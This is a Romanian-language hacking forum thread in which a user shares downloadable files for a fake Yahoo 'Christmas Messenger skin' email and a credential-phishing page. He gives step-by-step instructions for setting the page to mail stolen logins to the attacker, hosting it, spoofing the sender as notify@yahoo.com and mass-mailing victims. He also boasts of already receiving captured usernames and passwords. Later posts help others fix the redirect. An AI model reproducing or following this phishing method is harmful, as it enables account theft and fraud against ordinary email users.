Jump to content
drphunk

Christmas scam :)

Recommended Posts

Ca tot vine Craciunu ....

Am facut htmlu asta http://h1.ripway.com/lololololo/mail.rar care arata ca un mail din partea Yahoo prin care anunta ca au creat un skin nou de messenger special pt Craciun.

Acesta are un link care directioneaza catre un pagina de scam care e pusa pe un host, de preferabil geocities k tot sunt afiliate.

Am aici scamu http://h1.ripway.com/lololololo/Yahooscam.rar (sa schimbati [mail]MAILULTAU@DOMENIU.COM[/mail])

Cand trmiteti mailu...

Name:Santa Claus sau Yahoo!

Subject: ceva interesant pt a fi deschis mailu.

From: [mail]notify@yahoo.com[/mail]

Link to comment
Share on other sites

am uitat sa precizez ceva. in htmlu care contine mailul de la yahoo schimbati linkul astfel incat sa va duca la scamul pus de voi. htmul uploadat de mine contine linkul catre scamul meu.

am mentionat asta pt ca am primit azi niste usere si parole carora nu le-am trimis :)

pe mine nu ma deranjeaza insa :P

Link to comment
Share on other sites

Bogdanel wrote: pai eu nam reusit...sa modific... cum se face ...care ma ajuta?

nujtu ce nu reusesti sa faci, dar uite metoda completa...

1. dldezi cele 2 fisiere

2. deschizi scamu cu notepad si modifici astfel incat sa-ti trimita tie mail (cauti [mail]MAILULTAU@DOMENIU.COM[/mail])

3. iti faci un user pe un host si uploadezi acolo scamu. dak faci la geocities vezi ca are file manager pt lucru cu fisiere. dak faci in alta parte, foloseste un client ftp (yo folosesc CUTEFTP PROFESSIONAL).

4. deschizi htmlul, care contine asa zisul mail de la yahoo, cu notepad. modifici si aici astfel incat sa te duca la scamul uplodat mai sus.

5. folosesti un mailer pt a trimite pagina catre victima.

si cam atat.

succes

Link to comment
Share on other sites

HIEN@ wrote: cum fac sa nu mai imi redirectioneze pe geocities acel scam ca am modificat scam htm.si yahooscam.php si to pe geocities ma duce dati-mi si mie rand-ul care trebuie modificat de redirectionare :@ :@

cred ca am fost destul de clar cand am explicat mai sus pas cu pas. tu vrei mura in gura. ar fi cazu sa pui mana sa inveti si tu cateva lucruri elementare de html si nu numai.

aici nici macar atata lucru nu-ti trebuie. tot ce trebuie sa faci e sa gasesti un link pe care sa-l modifici. oricum dak nu stii nici macar asta, ma indoiesc ca vei stii sa duci metoda la capat.

numai bine

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...